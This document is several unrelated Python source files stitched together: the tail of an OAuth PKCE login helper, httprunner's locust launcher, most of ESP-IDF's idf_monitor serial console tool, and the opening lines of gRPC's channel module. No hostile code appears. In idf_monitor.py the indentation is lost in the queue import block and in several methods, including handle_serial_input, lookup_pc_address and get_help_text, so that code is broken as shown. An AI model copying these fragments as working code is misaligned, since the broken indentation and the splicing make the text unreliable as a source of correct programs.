        raise Exception("client_id and/or client_secret are empty")
    if not scope:
        raise Exception("scope is empty")
    token = {}
    # Standard OIDC scopes are always requested in addition to `scope`.
    scope_list = ["openid", "profile", "email", "user.details"] + scope
    # Start the local service (daemonized so it dies with this process)
    server = Process(target=main)
    server.daemon = True
    server.start()
    # PCKE code verifier and challenge: random alphanumeric verifier,
    # challenge = unpadded base64url(SHA-256(verifier))
    code_verifier = base64.urlsafe_b64encode(os.urandom(40)).decode("utf-8")
    code_verifier = re.sub("[^a-zA-Z0-9]+", "", code_verifier)
    code_challenge = hashlib.sha256(code_verifier.encode("utf-8")).digest()
    code_challenge = base64.urlsafe_b64encode(code_challenge).decode("utf-8")
    code_challenge = code_challenge.replace("=", "")
    try:
        # Request login page
        oauth = OAuth2Session(client_id, redirect_uri=REDIRECT_URI, scope=scope_list)
        authorization_url, _ = oauth.authorization_url(
            url=AUTHORITY_URL,
            code_challenge=code_challenge,
            code_challenge_method="S256",
        )
        authorization_url = authorization_url.replace("+", "%20")
        # Obtain redirect response: user authorizes in the browser, then
        # pastes the URL they were redirected to back into the terminal.
        webbrowser.open_new(authorization_url)
        redirect_response = input(
            "\nPlease authorize access and enter the redirect URL: "
        ).strip()
        # Terminate the local service because no longer needed
        server.terminate()
        redirect_params = parse_qs(urlparse(redirect_response).query)
        auth_code = redirect_params["code"][0]
        # NOTE(review): redirect_uri is sent as the full pasted URL,
        # not REDIRECT_URI — confirm the token endpoint accepts this.
        token = requests.post(
            url=PROD_TOKEN_URL,
            data={
                "grant_type": "authorization_code",
                "client_id": client_id,
                "client_secret": client_secret,
                "redirect_uri": redirect_response,
                "code": auth_code,
                "code_verifier": code_verifier,
            },
            allow_redirects=False,
        ).json()
    except Exception:
        raise
    return token
|
locusts.py | # encoding: utf-8
import io
import multiprocessing
import os
import sys
from httprunner.logger import color_print
from httprunner import loader
from locust.main import main
def parse_locustfile(file_path):
    """ parse testcase file and return locustfile path.
        if file_path is a Python file, assume it is a locustfile
        if file_path is a YAML/JSON file, convert it to locustfile
    """
    if not os.path.isfile(file_path):
        color_print("file path invalid, exit.", "RED")
        sys.exit(1)

    suffix = os.path.splitext(file_path)[1]
    if suffix == ".py":
        # already a locustfile, use it as-is
        return file_path
    if suffix in ('.yaml', '.yml', '.json'):
        # render a locustfile from the testcase definition
        return gen_locustfile(file_path)

    # '' or other suffix
    color_print("file type should be YAML/JSON/Python, exit.", "RED")
    sys.exit(1)
def gen_locustfile(testcase_file_path):
    """ generate locustfile from template.

    Renders templates/locustfile_template, substituting the target host
    (taken from the first testcase's base_url) and the testcase file
    path, and writes the result to ./locustfile.py.

    Returns:
        str: path of the generated locustfile ('locustfile.py').
    """
    locustfile_path = 'locustfile.py'
    template_path = os.path.join(
        os.path.dirname(os.path.realpath(__file__)),
        "templates",
        "locustfile_template"
    )
    testcases = loader.load_testcases(testcase_file_path)
    # host defaults to "" when the config block defines no base_url
    host = testcases[0].get("config", {}).get("request", {}).get("base_url", "")
    with io.open(template_path, encoding='utf-8') as template:
        with io.open(locustfile_path, 'w', encoding='utf-8') as locustfile:
            template_content = template.read()
            template_content = template_content.replace("$HOST", host)
            template_content = template_content.replace("$TESTCASE_FILE", testcase_file_path)
            locustfile.write(template_content)
    return locustfile_path
def start_master(sys_argv):
    """Run locust as master: append --master to the argv (mutates the
    caller's list in place), install it as sys.argv and invoke locust."""
    sys_argv.append("--master")
    sys.argv = sys_argv
    main()
def start_slave(sys_argv):
    """Run locust as slave: ensure --slave is present in the argv
    (mutates the caller's list), install it as sys.argv and invoke locust."""
    if "--slave" not in sys_argv:
        sys_argv.extend(["--slave"])
    sys.argv = sys_argv
    main()
def run_locusts_with_processes(sys_argv, processes_count):
    """Spawn `processes_count` locust slave processes, then either join
    them (pure slave mode) or run the master in this process."""
    processes = []
    manager = multiprocessing.Manager()
    for _ in range(processes_count):
        # daemonized so the slaves die with the parent process
        p_slave = multiprocessing.Process(target=start_slave, args=(sys_argv,))
        p_slave.daemon = True
        p_slave.start()
        processes.append(p_slave)
    try:
        if "--slave" in sys_argv:
            # slave-only invocation: just wait on the spawned slaves
            [process.join() for process in processes]
        else:
            # otherwise this process becomes the master
            start_master(sys_argv)
    except KeyboardInterrupt:
        manager.shutdown()
|
idf_monitor.py | #!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run "make flash" (Ctrl-T Ctrl-F)
# - Run "make app-flash" (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import print_function, division
import subprocess
import argparse
import codecs
import re
import os
try:
import queue
except ImportError:
import Queue as queue
import time
import sys
import serial
import serial.tools.miniterm as miniterm
import threading
import ctypes
import types
from distutils.version import StrictVersion
# Shortcut to pySerial's human-readable key-name helper.
key_description = miniterm.key_description

# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_Y = '\x19'
CTRL_P = '\x10'
CTRL_RBRACKET = '\x1d'  # Ctrl+]

# ANSI terminal codes (if changed, regular expressions in LineMatcher need to be updated)
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color):
    """ Print a message to stderr with colored highlighting """
    # color on, message, color reset, newline
    sys.stderr.write(color + message + ANSI_NORMAL + "\n")
def yellow_print(message):
    """ Print a warning-colored (yellow) message to stderr """
    color_print(message, ANSI_YELLOW)
def red_print(message):
    """ Print an error-colored (red) message to stderr """
    color_print(message, ANSI_RED)
__version__ = "1.1"

# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
TAG_SERIAL_FLUSH = 2

# regex matches an potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)

# default cross-compiler prefix and log filter used by the CLI
DEFAULT_TOOLCHAIN_PREFIX = "xtensa-esp32-elf-"
DEFAULT_PRINT_FILTER = ""
class StoppableThread(object):
    """
    Provide a Thread-like class which can be 'cancelled' via a subclass-provided
    cancellation method.

    Can be started and stopped multiple times.

    Isn't an instance of type Thread because Python Thread objects can only be run once
    """
    def __init__(self):
        # A fresh Thread is created on each start(); None means "not running".
        self._thread = None

    @property
    def alive(self):
        """
        Is 'alive' whenever the internal thread object exists
        """
        return self._thread is not None

    def start(self):
        # no-op when already running; otherwise spin up a new worker
        if self._thread is None:
            self._thread = threading.Thread(target=self._run_outer)
            self._thread.start()

    def _cancel(self):
        pass  # override to provide cancellation functionality

    def run(self):
        pass  # override for the main thread behaviour

    def _run_outer(self):
        try:
            self.run()
        finally:
            # clearing the handle marks the worker as no longer alive
            # and allows start() to be called again later
            self._thread = None

    def stop(self):
        if self._thread is not None:
            # clear self._thread FIRST so run() loops polling `alive`
            # exit; then unblock the thread and wait for it to finish
            old_thread = self._thread
            self._thread = None
            self._cancel()
            old_thread.join()
class ConsoleReader(StoppableThread):
    """ Read input keys from the console and push them to the queue,
    until stopped.
    """
    def __init__(self, console, event_queue, test_mode):
        super(ConsoleReader, self).__init__()
        self.console = console          # miniterm.Console instance
        self.event_queue = event_queue  # queue shared with the main loop
        self.test_mode = test_mode      # True when stdin is a PTY under test

    def run(self):
        self.console.setup()
        try:
            while self.alive:
                try:
                    if os.name == 'nt':
                        # Windows kludge: because the console.cancel() method doesn't
                        # seem to work to unblock getkey() on the Windows implementation.
                        #
                        # So we only call getkey() if we know there's a key waiting for us.
                        import msvcrt
                        while not msvcrt.kbhit() and self.alive:
                            time.sleep(0.1)
                        if not self.alive:
                            break
                    elif self.test_mode:
                        # In testing mode the stdin is connected to PTY but is not used for input anything. For PTY
                        # the canceling by fcntl.ioctl isn't working and would hang in self.console.getkey().
                        # Therefore, we avoid calling it.
                        while self.alive:
                            time.sleep(0.1)
                        break
                    c = self.console.getkey()
                except KeyboardInterrupt:
                    # Ctrl-C is forwarded to the target as a key event
                    c = '\x03'
                if c is not None:
                    self.event_queue.put((TAG_KEY, c), False)
        finally:
            self.console.cleanup()

    def _cancel(self):
        if os.name == 'posix' and not self.test_mode:
            # this is the way cancel() is implemented in pyserial 3.3 or newer,
            # older pyserial (3.1+) has cancellation implemented via 'select',
            # which does not work when console sends an escape sequence response
            #
            # even older pyserial (<3.1) does not have this method
            #
            # on Windows there is a different (also hacky) fix, applied above.
            #
            # note that TIOCSTI is not implemented in WSL / bash-on-Windows.
            # TODO: introduce some workaround to make it work there.
            #
            # Note: This would throw exception in testing mode when the stdin is connected to PTY.
            import fcntl, termios
            fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class SerialReader(StoppableThread):
    """ Read serial data from the serial port and push to the
    event queue, until stopped.
    """
    def __init__(self, serial, event_queue):
        super(SerialReader, self).__init__()
        # remember the configured baud rate so a closed port can be
        # reopened with the same settings in run()
        self.baud = serial.baudrate
        self.serial = serial
        self.event_queue = event_queue
        if not hasattr(self.serial, 'cancel_read'):
            # enable timeout for checking alive flag,
            # if cancel_read not available
            self.serial.timeout = 0.25

    def run(self):
        if not self.serial.is_open:
            self.serial.baudrate = self.baud
            self.serial.rts = True  # Force an RTS reset on open
            self.serial.open()
            self.serial.rts = False
        try:
            while self.alive:
                # read everything available, blocking for at least 1 byte
                data = self.serial.read(self.serial.in_waiting or 1)
                if len(data):
                    self.event_queue.put((TAG_SERIAL, data), False)
        finally:
            self.serial.close()

    def _cancel(self):
        if hasattr(self.serial, 'cancel_read'):
            try:
                self.serial.cancel_read()
            except Exception:
                # Narrowed from a bare except: cancellation is best-effort,
                # but KeyboardInterrupt/SystemExit must not be swallowed.
                pass
class LineMatcher:
    """
    Assembles a dictionary of filtering rules based on the --print_filter
    argument of idf_monitor. Then later it is used to match lines and
    determine whether they should be shown on screen or not.
    """
    LEVEL_N = 0
    LEVEL_E = 1
    LEVEL_W = 2
    LEVEL_I = 3
    LEVEL_D = 4
    LEVEL_V = 5

    level = {'N': LEVEL_N, 'E': LEVEL_E, 'W': LEVEL_W, 'I': LEVEL_I, 'D': LEVEL_D,
             'V': LEVEL_V, '*': LEVEL_V, '': LEVEL_V}

    def __init__(self, print_filter):
        self._dict = dict()
        self._re = re.compile(r'^(?:\033\[[01];?[0-9]+m?)?([EWIDV]) \([0-9]+\) ([^:]+): ')
        items = print_filter.split()
        if not items:
            # an empty filter shows everything
            self._dict["*"] = self.LEVEL_V
        for entry in items:
            parts = entry.split(r':')
            if len(parts) == 1:
                # specifying no warning level defaults to verbose level
                tag = parts[0]
                verbosity = self.LEVEL_V
            elif len(parts) == 2:
                tag = parts[0]
                if len(tag) == 0:
                    raise ValueError('No tag specified in filter ' + entry)
                try:
                    verbosity = self.level[parts[1].upper()]
                except KeyError:
                    raise ValueError('Unknown warning level in filter ' + entry)
            else:
                raise ValueError('Missing ":" in filter ' + entry)
            self._dict[tag] = verbosity

    def match(self, line):
        """Return True when `line` should be shown under the filter."""
        try:
            m = self._re.search(line)
            if m:
                lev = self.level[m.group(1)]
                if m.group(2) in self._dict:
                    return self._dict[m.group(2)] >= lev
                # unknown tag: fall back to the wildcard rule
                return self._dict.get("*", self.LEVEL_N) >= lev
        except (KeyError, IndexError):
            # Regular line written with something else than ESP_LOG*
            # or an empty line: fall through below.
            pass
        # We need something more than "*.N" for printing non-log lines.
        return self._dict.get("*", self.LEVEL_N) > self.LEVEL_N
class SerialStopException(Exception):
    """
    This exception is used for stopping the IDF monitor in testing mode.
    """
    pass
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
    def __init__(self, serial_instance, elf_file, print_filter, make="make", toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"):
        """Wire up reader threads, key bindings, filters and EOL translation.

        :param serial_instance: pyserial Serial (or URL-based) instance, not yet opened
        :param elf_file: path of the application ELF (used for addr2line / gdb)
        :param print_filter: filter specification handed to LineMatcher
        :param make: command used to invoke make for the flash/app-flash menu keys
        :param toolchain_prefix: cross-toolchain triplet prefix for addr2line/gdb
        :param eol: "CRLF", "CR" or "LF" -- newline translation for keys sent to target
        """
        super(Monitor, self).__init__()
        self.event_queue = queue.Queue()
        self.console = miniterm.Console()
        if os.name == 'nt':
            # On Windows, translate ANSI color escapes into console attribute calls.
            sys.stderr = ANSIColorConverter(sys.stderr)
            self.console.output = ANSIColorConverter(self.console.output)
            self.console.byte_output = ANSIColorConverter(self.console.byte_output)
        if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):
            # Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)
            def getkey_patched(self):
                c = self.enc_stdin.read(1)
                if c == unichr(0x7f):
                    c = unichr(8)  # map the BS key (which yields DEL) to backspace
                return c
            self.console.getkey = types.MethodType(getkey_patched, self.console)
        socket_mode = serial_instance.port.startswith("socket://")  # testing hook - data from serial can make exit the monitor
        self.serial = serial_instance
        self.console_reader = ConsoleReader(self.console, self.event_queue, socket_mode)
        self.serial_reader = SerialReader(self.serial, self.event_queue)
        self.elf_file = elf_file
        self.make = make
        self.toolchain_prefix = toolchain_prefix
        self.menu_key = CTRL_T
        self.exit_key = CTRL_RBRACKET
        # Map stdin newlines onto the end-of-line convention the target expects.
        self.translate_eol = {
            "CRLF": lambda c: c.replace(b"\n", b"\r\n"),
            "CR": lambda c: c.replace(b"\n", b"\r"),
            "LF": lambda c: c.replace(b"\r", b"\n"),
        }[eol]
        # internal state
        self._pressed_menu_key = False  # previous key was the menu escape key
        self._last_line_part = b""      # buffered tail of an incomplete serial line
        self._gdb_buffer = b""          # tail kept in case a gdb trigger is split across reads
        self._pc_address_buffer = b""   # tail kept in case a PC address is split across reads
        self._line_matcher = LineMatcher(print_filter)
        self._invoke_processing_last_line_timer = None
        self._force_line_print = False
        self._output_enabled = True
        self._serial_check_exit = socket_mode
    def invoke_processing_last_line(self):
        # Queue a flush event so a buffered EOL-less tail line gets finalized
        # by main_loop (called from the 0.1s timer armed on TAG_SERIAL events).
        self.event_queue.put((TAG_SERIAL_FLUSH, b''), False)
    def main_loop(self):
        """Run the central event loop: dispatch queued key/serial events until a reader stops."""
        self.console_reader.start()
        self.serial_reader.start()
        try:
            while self.console_reader.alive and self.serial_reader.alive:
                (event_tag, data) = self.event_queue.get()
                if event_tag == TAG_KEY:
                    self.handle_key(data)
                elif event_tag == TAG_SERIAL:
                    self.handle_serial_input(data)
                    # Re-arm the flush timer on every serial event.
                    if self._invoke_processing_last_line_timer is not None:
                        self._invoke_processing_last_line_timer.cancel()
                    self._invoke_processing_last_line_timer = threading.Timer(0.1, self.invoke_processing_last_line)
                    self._invoke_processing_last_line_timer.start()
                    # If no further data is received in the next short period
                    # of time then the _invoke_processing_last_line_timer
                    # generates an event which will result in the finishing of
                    # the last line. This is fix for handling lines sent
                    # without EOL.
                elif event_tag == TAG_SERIAL_FLUSH:
                    self.handle_serial_input(data, finalize_line=True)
                else:
                    raise RuntimeError("Bad event data %r" % ((event_tag,data),))
        except SerialStopException:
            # Raised from handle_serial_input when in testing (socket) mode.
            pass
        finally:
            try:
                self.console_reader.stop()
                self.serial_reader.stop()
                # Cancelling _invoke_processing_last_line_timer is not
                # important here because receiving empty data doesn't matter.
                self._invoke_processing_last_line_timer = None
            except:  # best-effort shutdown; never mask the original exception
                pass
            sys.stderr.write(ANSI_NORMAL + "\n")
    def handle_key(self, key):
        """Dispatch one console keypress: menu sequence, exit, or forward to the target."""
        if self._pressed_menu_key:
            # Previous key was Ctrl-T: interpret this key as a menu command.
            self.handle_menu_key(key)
            self._pressed_menu_key = False
        elif key == self.menu_key:
            self._pressed_menu_key = True
        elif key == self.exit_key:
            self.console_reader.stop()
            self.serial_reader.stop()
        else:
            try:
                key = self.translate_eol(key)
                self.serial.write(codecs.encode(key))
            except serial.SerialException:
                pass  # this shouldn't happen, but sometimes port has closed in serial thread
            except UnicodeEncodeError:
                pass  # this can happen if a non-ascii character was passed, ignoring
def handle_serial_input(self, data, finalize_line=False):
sp = data.split(b'\n')
if self._last_line_part != b"":
# add unprocessed part from previous "data" to the first line
sp[0] = self._last_line_part + sp[0]
self._last_line_part = b""
if sp[-1] != b"":
# last part is not a full line
self._last_line_part = sp.pop()
for line in sp:
if line != b"":
if self._serial_check_exit and line == self.exit_key:
raise SerialStopException()
if self._output_enabled and (self._force_line_print or self._line_matcher.match(line)):
self.console.write_bytes(line + b'\n')
self.handle_possible_pc_address_in_line(line)
self.check_gdbstub_trigger(line)
self._force_line_print = False
# Now we have the last part (incomplete line) in _last_line_part. By
# default we don't touch it and just wait for the arrival of the rest
# of the line. But after some time when we didn't received it we need
# to make a decision.
if self._last_line_part != b"":
if self._force_line_print or (finalize_line and self._line_matcher.match(self._last_line_part)):
self._force_line_print = True;
if self._output_enabled:
self.console.write_bytes(self._last_line_part)
self.handle_possible_pc_address_in_line(self._last_line_part)
self.check_gdbstub_trigger(self._last_line_part)
# It is possible that the incomplete line cuts in half the PC
# address. A small buffer is kept and will be used the next time
# handle_possible_pc_address_in_line is invoked to avoid this problem.
# MATCH_PCADDR matches 10 character long addresses. Therefore, we
# keep the last 9 characters.
self._pc_address_buffer = self._last_line_part[-9:]
# GDB sequence can be cut in half also. GDB sequence is 7
# characters long, therefore, we save the last 6 characters.
self._gdb_buffer = self._last_line_part[-6:]
self._last_line_part = b""
# else: keeping _last_line_part and it will be processed the next time
# handle_serial_input is invoked
def handle_possible_pc_address_in_line(self, line):
line = self._pc_address_buffer + line
self._pc_address_buffer = b""
for m in re.finditer(MATCH_PCADDR, line):
self.lookup_pc_address(m.group())
    def handle_menu_key(self, c):
        """Execute the menu command *c* (the key pressed after the Ctrl-T escape)."""
        if c == self.exit_key or c == self.menu_key:  # send verbatim
            self.serial.write(codecs.encode(c))
        elif c in [ CTRL_H, 'h', 'H', '?' ]:
            red_print(self.get_help_text())
        elif c == CTRL_R:  # Reset device via RTS
            self.serial.setRTS(True)
            time.sleep(0.2)
            self.serial.setRTS(False)
            self.output_enable(True)
        elif c == CTRL_F:  # Recompile & upload
            self.run_make("flash")
        elif c == CTRL_A:  # Recompile & upload app only
            self.run_make("app-flash")
        elif c == CTRL_Y:  # Toggle output display
            self.output_toggle()
        elif c == CTRL_P:
            yellow_print("Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart")
            # to fast trigger pause without press menu key
            # The DTR/RTS sequence and its exact delays matter -- do not reorder.
            self.serial.setDTR(False)  # IO0=HIGH
            self.serial.setRTS(True)  # EN=LOW, chip in reset
            time.sleep(1.3)  # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1
            self.serial.setDTR(True)  # IO0=LOW
            self.serial.setRTS(False)  # EN=HIGH, chip out of reset
            time.sleep(0.45)  # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05
            self.serial.setDTR(False)  # IO0=HIGH, done
        else:
            red_print('--- unknown menu character {} --'.format(key_description(c)))
def get_help_text(self):
return """
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {reset:7} Reset target board via RTS line
--- {make:7} Run 'make flash' to build & flash
--- {appmake:7} Run 'make app-flash to build & flash app
--- {output:7} Toggle output display
--- {pause:7} Reset target into bootloader to pause app via RTS line
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
make=key_description(CTRL_F),
appmake=key_description(CTRL_A),
output=key_description(CTRL_Y),
pause=key_description(CTRL_P),
)
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
    def __exit__(self, *args, **kwargs):
        """ Use 'with self' to temporarily disable monitoring behaviour """
        # Restart the readers stopped by __enter__; exceptions are not suppressed
        # (implicitly returns None).
        self.console_reader.start()
        self.serial_reader.start()
    def prompt_next_action(self, reason):
        """After *reason* (e.g. a failed build or gdb exit), ask the user what to do next."""
        self.console.setup()  # set up console to trap input characters
        try:
            red_print("""
--- {}
--- Press {} to exit monitor.
--- Press {} to run 'make flash'.
--- Press {} to run 'make app-flash'.
--- Press any other key to resume monitor (resets target).""".format(reason,
                key_description(self.exit_key),
                key_description(CTRL_F),
                key_description(CTRL_A)))
            k = CTRL_T  # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
            while k == CTRL_T:
                k = self.console.getkey()
        finally:
            self.console.cleanup()
        if k == self.exit_key:
            self.event_queue.put((TAG_KEY, k))
        elif k in [ CTRL_F, CTRL_A ]:
            # Replay the full menu sequence so main_loop runs the make target.
            self.event_queue.put((TAG_KEY, self.menu_key))
            self.event_queue.put((TAG_KEY, k))
    def run_make(self, target):
        """Run `make <target>` with monitoring paused; re-prompt the user on failure."""
        with self:  # __enter__/__exit__ pause the reader threads around make
            yellow_print("Running make %s..." % target)
            p = subprocess.Popen([self.make,
                                  target ])
            try:
                p.wait()
            except KeyboardInterrupt:
                # Wait again so make can finish handling the interrupt.
                p.wait()
            if p.returncode != 0:
                self.prompt_next_action("Build failed")
            else:
                self.output_enable(True)
def lookup_pc_address(self, pc_addr):
translation = subprocess.check_output(
["%saddr2line" % self.toolchain_prefix,
"-pfiaC", "-e", self.elf_file, pc_addr],
cwd=".")
if not "?? ??:0" in translation:
yellow_print(translation)
    def check_gdbstub_trigger(self, line):
        """Look for a gdbstub break sequence ($T..#..) in *line*; launch gdb on a valid match."""
        line = self._gdb_buffer + line  # prepend tail saved from a previous partial line
        self._gdb_buffer = b""
        m = re.search(b"\\$(T..)#(..)", line)  # look for a gdb "reason" for a break
        if m is not None:
            try:
                # NOTE(review): ord() over the matched payload assumes Python 2
                # byte-iteration semantics; on Python 3 bytes iterate as ints --
                # confirm against the supported runtime.
                chsum = sum(ord(p) for p in m.group(1)) & 0xFF
                calc_chsum = int(m.group(2), 16)
            except ValueError:
                return  # payload wasn't valid hex digits
            if chsum == calc_chsum:
                self.run_gdb()
            else:
                red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum))
    def run_gdb(self):
        """Attach gdb to the target over the monitor's serial port, then re-prompt."""
        with self:  # disable console control while gdb owns the terminal
            sys.stderr.write(ANSI_NORMAL)
            try:
                process = subprocess.Popen(["%sgdb" % self.toolchain_prefix,
                                            "-ex", "set serial baud %d" % self.serial.baudrate,
                                            "-ex", "target remote %s" % self.serial.port,
                                            "-ex", "interrupt",  # monitor has already parsed the first 'reason' command, need a second
                                            self.elf_file], cwd=".")
                process.wait()
            except KeyboardInterrupt:
                pass  # happens on Windows, maybe other OSes
            finally:
                try:
                    # on Linux, maybe other OSes, gdb sometimes seems to be alive even after wait() returns...
                    # (also covers 'process' being unbound if Popen itself failed)
                    process.terminate()
                except:
                    pass
                try:
                    # also on Linux, maybe other OSes, gdb sometimes exits uncleanly and breaks the tty mode
                    subprocess.call(["stty", "sane"])
                except:
                    pass  # don't care if there's no stty, we tried...
            self.prompt_next_action("gdb exited")
    def output_enable(self, enable):
        # Gate whether serial lines are echoed to the console (read by handle_serial_input).
        self._output_enabled = enable
    def output_toggle(self):
        """Flip console echo of serial output on/off (bound to Ctrl-T Ctrl-Y)."""
        self._output_enabled = not self._output_enabled
        yellow_print("\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.".format(self._output_enabled))
def main():
    """Parse command-line arguments, open the serial port and run the Monitor loop."""
    parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf")
    parser.add_argument(
        '--port', '-p',
        help='Serial port device',
        default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0')
    )
    parser.add_argument(
        '--baud', '-b',
        help='Serial port baud rate',
        type=int,
        default=os.environ.get('MONITOR_BAUD', 115200))
    parser.add_argument(
        '--make', '-m',
        help='Command to run make',
        type=str, default='make')
    parser.add_argument(
        '--toolchain-prefix',
        help="Triplet prefix to add before cross-toolchain names",
        default=DEFAULT_TOOLCHAIN_PREFIX)
    parser.add_argument(
        "--eol",
        choices=['CR', 'LF', 'CRLF'],
        type=lambda c: c.upper(),
        help="End of line to use when sending to the serial port",
        default='CR')
    parser.add_argument(
        'elf_file', help='ELF file of application',
        type=argparse.FileType('rb'))
    parser.add_argument(
        '--print_filter',
        help="Filtering string",
        default=DEFAULT_PRINT_FILTER)
    args = parser.parse_args()
    # macOS: /dev/tty.* devices hang gdb, so substitute the /dev/cu.* twin.
    if args.port.startswith("/dev/tty."):
        args.port = args.port.replace("/dev/tty.", "/dev/cu.")
        yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.")
        yellow_print("--- Using %s instead..." % args.port)
    serial_instance = serial.serial_for_url(args.port, args.baud,
                                            do_not_open=True)
    # NOTE(review): DTR/RTS are de-asserted before opening, presumably to avoid
    # resetting the target on connect (these lines drive EN/IO0) -- confirm.
    serial_instance.dtr = False
    serial_instance.rts = False
    args.elf_file.close()  # don't need this as a file
    # remove the parallel jobserver arguments from MAKEFLAGS, as any
    # parent make is only running 1 job (monitor), so we can re-spawn
    # all of the child makes we need (the -j argument remains part of
    # MAKEFLAGS)
    try:
        makeflags = os.environ["MAKEFLAGS"]
        makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags)
        os.environ["MAKEFLAGS"] = makeflags
    except KeyError:
        pass  # not running a make jobserver
    monitor = Monitor(serial_instance, args.elf_file.name, args.print_filter, args.make, args.toolchain_prefix, args.eol)
    yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
        p=serial_instance))
    yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
        key_description(monitor.exit_key),
        key_description(monitor.menu_key),
        key_description(monitor.menu_key),
        key_description(CTRL_H)))
    if args.print_filter != DEFAULT_PRINT_FILTER:
        yellow_print('--- Print filter: {} ---'.format(args.print_filter))
    monitor.main_loop()
if os.name == 'nt':
    # Windows console stuff
    STD_OUTPUT_HANDLE = -11
    STD_ERROR_HANDLE = -12

    # wincon.h values
    FOREGROUND_INTENSITY = 8
    FOREGROUND_GREY = 7

    # matches the ANSI color change sequences that IDF sends
    RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')

    # list mapping the 8 ANSI colors (the indexes) to Windows Console colors
    ANSI_TO_WINDOWS_COLOR = [ 0, 4, 2, 6, 1, 5, 3, 7 ]

    GetStdHandle = ctypes.windll.kernel32.GetStdHandle
    SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute

    class ANSIColorConverter(object):
        """Class to wrap a file-like output stream, intercept ANSI color codes,
        and convert them into calls to Windows SetConsoleTextAttribute.

        Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.

        Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
        color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
        least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
        """

        def __init__(self, output):
            self.output = output
            self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
            self.matched = b''  # partial escape sequence accumulated so far

        def _output_write(self, data):
            try:
                self.output.write(data)
            except IOError:
                # Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly throws
                # an exception (however, the character is still written to the screen)
                # Ref https://github.com/espressif/esp-idf/issues/1136
                pass

        def write(self, data):
            # Small state machine: accumulate a potential ANSI escape sequence
            # in self.matched; translate recognized color codes into console
            # attribute calls, pass anything else through verbatim.
            for b in data:
                l = len(self.matched)
                if b == '\033':  # ESC
                    self.matched = b
                elif (l == 1 and b == '[') or (1 < l < 7):
                    self.matched += b
                    if self.matched == ANSI_NORMAL:  # reset console
                        SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
                        self.matched = b''
                    elif len(self.matched) == 7:  # could be an ANSI sequence
                        m = re.match(RE_ANSI_COLOR, self.matched)
                        if m is not None:
                            color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
                            if m.group(1) == b'1':
                                color |= FOREGROUND_INTENSITY
                            SetConsoleTextAttribute(self.handle, color)
                        else:
                            self._output_write(self.matched)  # not an ANSI color code, display verbatim
                        self.matched = b''
                else:
                    self._output_write(b)
                    self.matched = b''

        def flush(self):
            self.output.flush()
# Script entry point.
if __name__ == "__main__":
    main()
|
_channel.py | # Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Invocation-side implementation of gRPC Python."""
import copy
